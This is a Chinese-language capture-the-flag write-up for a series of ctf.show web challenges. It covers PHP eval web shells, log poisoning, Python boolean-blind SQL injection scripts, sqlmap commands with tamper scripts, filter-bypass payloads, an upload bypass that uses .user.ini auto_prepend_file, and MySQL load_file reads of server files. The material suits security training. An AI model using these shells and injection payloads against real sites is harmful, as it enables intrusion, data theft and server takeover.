[huayang]
web1
web2
手注
sqlmap
web3
web4
payload
?url=/var/log/nginx/access.log看日志
写入一句话
<?php @eval($_POST[b]);?>
web5
md5碰撞v1只能用字母v2只能用数字
ctype_alpha — 做纯字符检测
is_numeric() 函数用于检测变量是否为数字或数字字符串。
web6
盲猜空格绕过
加个注释就行
sqlmap
web7
相当于布尔盲注
import requests
urls = 'http://478951db-f91e-4a82-9941-c35a7c3ee800.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning'
name = ''
for number1 in range(50): # 猜flag位数
for number2 in range(44, 126): # ASCII 字符0 ~ }
# # 库
# url = urls + 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d' % (number1, number2)
# #表
# url = urls + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' % (number1,number2)
#字段
# url = urls + 'ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),%d,1))=%d' % (number1,number2)
#字段信息
url = urls + 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' % (number1,number2)
response = requests.get(url)
if true in response.text:
name += chr(number2) # chr()返回 ASCII 字符
print(name, '...')
break
print('\n>>>flag=', name, '<<<\n')
sqlmap
同上
web8
增加过滤逗号
import requests
urls = 'http://fdff3c6b-2123-42d2-9830-96145951c2ad.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning'
name = ''
for number1 in range(50): # 猜flag位数
for number2 in range(44, 126): # ASCII 字符0 ~ }
# # 库
# url = urls + 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d' % (number1, number2)
# #表
# url = urls + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' % (number1,number2)
#字段
url = urls + 'ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/1/**/offset/**/0)from/**/%d/**/for/**/1))=%d' % (number1,number2)
# #字段信息
# url = urls + 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' % (number1,number2)
response = requests.get(url)
if true in response.text:
name += chr(number2) # chr()返回 ASCII 字符
print(name, '...')
break
print('\n>>>flag=', name, '<<<\n')
web9
<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
echo "登陆成功<br>";
echo $flag;
}
}
?>这题很难
payload:
ffifdyop
web10
点击取消
<?php
$flag="";
function replaceSpecialChar($strParam){
$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
if(strlen($username)!=strlen(replaceSpecialChar($username))){
die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
$sql="select * from user where username = '$username'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
if($password==$row['password']){
echo "登陆成功<br>";
echo $flag;
}
}
}
?>
payload
'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP/**/LIMIT/**/1/**/OFFSET/**/1#web11
密码为空,登录
删掉这个,再刷新
web12
?cmd=highlight_file('index.php');
?cmd=print_r(glob('*'));
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');web13
没扫出来
e24395a1-1b54-4b11-892e-cdd1b8fd55a0.chall.ctf.show/upload.php.bak
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
if ($size > 24){
die("error file zise");
}
if (strlen($filename)>9){
die("error file name");
}
if(strlen($ext_suffix)>3){
die("error suffix");
}
if(preg_match("/php/i",$ext_suffix)){
die("error suffix");
}
if(preg_match("/php/i"),$filename)){
die("error file name");
}
if (move_uploaded_file($temp_name, './'.$filename)){
echo "文件上传成功!";
}else{
echo "文件上传失败!";
}
?>写入一句话
因为不能连蚁剑所以写成get形式的
<?php eval($_GET['a']);保存为a.txt并上传
再写一个.user.ini文件包含a.txt并上传
auto_prepend_file=a.txt成功之后
?a=print_r(glob('*'));
?a=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
web14
看不懂?
我也是,所以一个一个的去试
当c=3时出现如下画面
进去看看
盲猜注入
看看源代码发现过滤
加上脚本直接一梭子
库
py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -dbs
表
py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web --tables
字段名
py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web -T content --columns
看这字段的信息就知道没有我们想要的flag
但还是打一下,万一呢
字段信息
py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web -T content -C password --dump
果然
下面就看看羽师傅的wp
到这我们发现数据库中并没有我们想要的flag,但是有一条提示tell you a secret,secert has a secret… 所以很有可能flag在secret.php中,现在就有一个问题,我们怎么从数据库中查看文件内容呢,mysql提供了读取本地文件的函数load_file()
所以我们构造语句:
?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')得到如下内容
<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
echo file_get_contents('/real_flag_is_here');
}')
也就是如果/tmp/gtf1y中的内容为ctf.show则输出/real_flag_is_here中的值,所以我们直接将/real_flag_is_here读取即可得到flag。
?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')
[/huayang]
[/huayang]
FROM:浅浅淡淡[hellohy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论